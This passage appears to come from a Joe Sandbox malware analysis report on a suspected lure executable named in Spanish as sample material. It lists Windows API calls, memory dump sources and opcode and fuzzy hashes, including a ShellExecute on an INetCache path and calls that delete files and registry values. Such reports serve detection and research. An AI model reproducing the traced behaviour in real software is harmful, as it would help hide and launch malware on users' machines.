                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 485dd2f437d6d45197d879961a20dd383e7e92377303e2cdc915efeb5cb8a162
                                                • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                • Opcode Fuzzy Hash: 485dd2f437d6d45197d879961a20dd383e7e92377303e2cdc915efeb5cb8a162
                                                • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                APIs
                                                  • Part of subcall function 00405DC2: GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                  • Part of subcall function 00405DC2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405B9D), ref: 004059D6
                                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B9D), ref: 004059DE
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$Attributes$DeleteDirectoryRemove
                                                • String ID:
                                                • API String ID: 1655745494-0
                                                • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                • Instruction ID: bc22120fb0abf4725c7bfcc2d312b2669146bcdc80e6b93b711a22507a8c90f5
                                                • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                • Instruction Fuzzy Hash: 29E06572219A9196C2106735590CB5F2998DF86734F054A3BF591B11D0DB7888068A7D
                                                APIs
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,?), ref: 00401EC1
                                                Strings
                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable, xrefs: 00401EAA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable
                                                • API String ID: 587946157-629450151
                                                • Opcode ID: 60c3e4594977ef17e214abd782440c60fef5d923f70383dd27c4332d533364e9
                                                • Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
                                                • Opcode Fuzzy Hash: 60c3e4594977ef17e214abd782440c60fef5d923f70383dd27c4332d533364e9
                                                • Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastRead
                                                • String ID:
                                                • API String ID: 1948546556-0
                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                APIs
                                                • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,000001EE,00000000,00000022,00000000,?,?), ref: 00402D85
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 75c219b870972f87efc8e93285d69702e50401aa8d59e26d506de1170bc7c1b1
                                                • Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
                                                • Opcode Fuzzy Hash: 75c219b870972f87efc8e93285d69702e50401aa8d59e26d506de1170bc7c1b1
                                                • Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,000001EE,00000000,00000022,00000000,?,?), ref: 00402D85
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 54dc5824f5c0b92d3717b9ad71fc9fb5e9820c420ec4ed7a34213902fe8ebc0d
                                                • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                • Opcode Fuzzy Hash: 54dc5824f5c0b92d3717b9ad71fc9fb5e9820c420ec4ed7a34213902fe8ebc0d
                                                • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 9adac78c471a7b014724d29a43e55a2d617bbe92051c3315918a9e4bc9b204ee
                                                • Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
                                                • Opcode Fuzzy Hash: 9adac78c471a7b014724d29a43e55a2d617bbe92051c3315918a9e4bc9b204ee
                                                • Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 3df8f9aa0e84aed34486b50dc89b6c196ba83f63d566bf1c6c21640ce3ab5a10
                                                • Instruction ID: 260cd15fba1b918f9c8f7222e6ae0819555963ba5a0cf8c35b7be57c581c0378
                                                • Opcode Fuzzy Hash: 3df8f9aa0e84aed34486b50dc89b6c196ba83f63d566bf1c6c21640ce3ab5a10
                                                • Instruction Fuzzy Hash: 4DE04F76B00104EBCB24CBA4ED908AE77A6EB483147514D7AD502B32A0CA759C51CF38
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                  • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                  • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                  • Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00405DEB
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                • GetLastError.KERNEL32 ref: 004058D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
